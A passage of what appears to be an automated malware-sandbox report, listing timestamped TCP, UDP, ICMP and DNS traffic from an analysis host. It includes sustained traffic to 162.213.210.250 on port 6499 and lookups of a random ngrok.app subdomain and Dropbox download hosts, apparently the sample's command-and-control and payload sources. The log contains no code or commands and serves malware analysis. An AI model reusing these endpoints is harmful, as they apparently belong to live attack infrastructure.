                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.536056995 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.536634922 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.536716938 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.536730051 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.536771059 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.537506104 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.537547112 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.537580967 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.537609100 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.537671089 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.538398981 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.538542986 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.538554907 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.538628101 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.539027929 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.539093018 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.539107084 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.539145947 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.539165020 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.539808989 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540009022 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540064096 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540096998 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540122986 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540189981 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540755987 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540851116 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540862083 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.540894985 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.541527987 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.541572094 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.541680098 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.541696072 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.541733027 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.542272091 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.542356968 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.542382956 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.542403936 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543086052 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543104887 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543116093 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543149948 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543184042 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543783903 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543891907 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543905973 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.543937922 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.544550896 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.544606924 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.544642925 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.544657946 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.544740915 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.545375109 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.545464039 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.545475960 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.545841932 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.546159029 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.546171904 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.546184063 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.546210051 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.546222925 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.546845913 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.546979904 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.546993971 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.547044039 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:23.294579983 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:23.320035934 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:23.670300961 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:23.678936005 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:23.793875933 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:23.802166939 CET649949834162.213.210.250192.168.2.4

                                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.412512064 CET4935353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.647444963 CET53493531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.310353041 CET4999553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.446985960 CET53499951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.098697901 CET6443553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.432374954 CET53644351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:25.767358065 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:30.760183096 CET6254653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.493679047 CET53625461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.566633940 CET5810053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.630379915 CET6365453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.703061104 CET53581001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.768965006 CET53636541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.304267883 CET4955453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.305504084 CET5649953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.529500961 CET5503553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.535239935 CET6294753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.535389900 CET6499553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.710074902 CET5053253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.710342884 CET6039253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849838972 CET53505321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849864006 CET53550351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.850136042 CET53629471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.858146906 CET53649951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.943033934 CET53603921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.344784021 CET5409053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.344980001 CET6225353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.345784903 CET5979953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.346030951 CET6398053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.414722919 CET4926653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.415196896 CET5005053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481498957 CET53540901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481549025 CET53622531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481978893 CET53597991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.482808113 CET53639801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.551862001 CET53492661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.552150965 CET53500501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:38.959584951 CET5460253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.006038904 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.292480946 CET53546021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.349930048 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.962562084 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.091665983 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.091720104 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.091731071 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.091938972 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.276794910 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.486238003 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.488217115 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.489038944 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.495213985 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.542846918 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.802756071 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.802767038 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.802776098 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.802788019 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.805069923 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.805154085 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.808789015 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.853632927 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.118935108 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.151437998 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.458093882 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.630013943 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.630172968 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.630366087 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.630537033 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.635993004 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.637828112 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.644561052 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.773785114 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.783524990 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.784060001 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.952807903 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.952898979 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.952913046 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.952923059 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.953881025 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.953989029 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.958324909 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.098695040 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.101488113 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.101747990 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.105575085 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.267622948 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.309087038 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.563918114 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.564023972 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.879048109 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.900409937 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.906881094 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.907636881 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.378638983 CET5725553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.720040083 CET53572551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.860472918 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.860589027 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.175751925 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.178113937 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.178415060 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.188652039 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:51.209085941 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:51.209319115 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:51.525023937 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:51.526681900 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:51.526981115 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:51.532743931 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:57.106956005 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:57.107302904 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:57.430537939 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:57.433648109 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:57.434283018 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:57.464904070 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.650525093 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.651427031 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.652023077 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.652378082 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.966379881 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.967216969 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.967256069 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.967478991 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.967824936 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.968153000 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.972017050 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:04.972573042 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:34.381591082 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:34.381886959 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:34.382205963 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:34.382363081 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.399028063 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.399110079 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.399673939 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.399713039 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.467413902 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.476349115 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.476563931 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.508907080 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.539427996 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.539525032 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.738636017 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.738646984 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.738665104 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.738675117 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.738892078 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.738902092 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.738950968 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.739186049 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.739264011 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.739327908 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.739443064 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.742619038 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.793268919 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.824485064 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.859888077 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.860944033 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.860960007 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.862576962 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:35.864347935 CET61992443192.168.2.4204.79.197.237
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.067581892 CET44357909172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.102224112 CET57909443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.164673090 CET61992443192.168.2.4204.79.197.237
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.774458885 CET61992443192.168.2.4204.79.197.237
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.966617107 CET44361992204.79.197.237192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.968241930 CET61992443192.168.2.4204.79.197.237
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:37.089416027 CET44361992204.79.197.237192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:37.285916090 CET44361992204.79.197.237192.168.2.4

                                                                                                                                                                                                                                                                                  ICMP Packets

                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.699966908 CET192.168.2.41.1.1.1c298(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.943108082 CET192.168.2.41.1.1.1c24a(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.412512064 CET192.168.2.41.1.1.10xd78Standard query (0)7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.310353041 CET192.168.2.41.1.1.10x8d19Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.098697901 CET192.168.2.41.1.1.10x7667Standard query (0)uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:30.760183096 CET192.168.2.41.1.1.10xe97fStandard query (0)uc99c9846721962dead0990bdd22.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.566633940 CET192.168.2.41.1.1.10xf55cStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.630379915 CET192.168.2.41.1.1.10x8095Standard query (0)www.dropbox.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.304267883 CET192.168.2.41.1.1.10x7ca4Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.305504084 CET192.168.2.41.1.1.10x77dfStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.529500961 CET192.168.2.41.1.1.10xa85Standard query (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.535239935 CET192.168.2.41.1.1.10x1c07Standard query (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
